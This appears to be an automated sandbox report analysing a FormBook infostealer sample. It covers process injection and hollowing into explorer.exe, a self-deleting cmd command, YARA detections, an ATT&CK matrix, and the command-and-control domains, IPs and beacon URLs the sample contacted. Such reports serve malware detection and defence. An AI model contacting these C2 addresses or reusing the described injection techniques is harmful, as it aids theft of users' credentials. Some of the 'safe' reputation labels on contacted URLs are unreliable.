          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 35.169.40.107 80
          Source: C:\Windows\explorer.exeDomain query: www.mekarauroko7389.com
          Source: C:\Windows\explorer.exeDomain query: www.oklahomasundayschool.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.239.72 80
          Source: C:\Windows\explorer.exeDomain query: www.shamushalkowich.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\444890321.exeSection loaded: unknown target: C:\Users\user\Desktop\444890321.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\444890321.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\444890321.exeSection loaded: unknown target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\444890321.exeSection loaded: unknown target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\444890321.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\444890321.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\444890321.exeSection unmapped: C:\Windows\System32\backgroundTaskHost.exe base address: A30000
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
          Source: explorer.exe, 00000004.00000000.215576974.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433174 Sample: 444890321.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 9 444890321.exe 20 2->9         started        process3 file4 31 C:\Users\user\AppData\Local\...\System.dll, PE32 9->31 dropped 55 Detected unpacking (changes PE section rights) 9->55 57 Maps a DLL or memory area into another process 9->57 59 Tries to detect virtualization through RDTSC time measurements 9->59 13 444890321.exe 9->13         started        signatures5 process6 signatures7 61 Modifies the context of a thread in another process (thread injection) 13->61 63 Maps a DLL or memory area into another process 13->63 65 Sample uses process hollowing technique 13->65 67 Queues an APC in another process (thread injection) 13->67 16 explorer.exe 13->16 injected 20 backgroundTaskHost.exe 1 14 13->20         started        process8 dnsIp9 33 mekarauroko7389.com 163.44.239.72, 49728, 80 INTERQGMOInternetIncJP Japan 16->33 35 www.oklahomasundayschool.com 199.59.242.153, 49735, 80 BODIS-NJUS United States 16->35 37 2 other IPs or domains 16->37 39 System process connects to network (likely due to code injection or exploit) 16->39 22 WWAHost.exe 16->22         started        25 autochk.exe 16->25         started        27 cmd.exe 1 20->27         started        signatures10 process11 signatures12 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 29 conhost.exe 27->29         started        process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          444890321.exe23%MetadefenderBrowse
          444890321.exe68%ReversingLabsWin32.Backdoor.Androm
          444890321.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.444890321.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.2.444890321.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.444890321.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.444890321.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          10.2.WWAHost.exe.431f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          10.2.WWAHost.exe.34498d0.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.444890321.exe.23b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.444890321.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRev0%Avira URL Cloudsafe
          http://www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp0%Avira URL Cloudsafe
          http://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.111bjs.com/ccr/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mekarauroko7389.com
          163.44.239.72
          truetrue
            unknown
            www.oklahomasundayschool.com
            199.59.242.153
            truetrue
              unknown
              www.shamushalkowich.com
              35.169.40.107
              truetrue
                unknown
                www.mekarauroko7389.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zptrue
                  • Avira URL Cloud: safe
                  unknown
                  www.111bjs.com/ccr/true
                  • Avira URL Cloud: malware
                  low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                            high
                            https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevWWAHost.exe, 0000000A.00000002.472331929.000000000480F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorError444890321.exefalse
                                high
                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
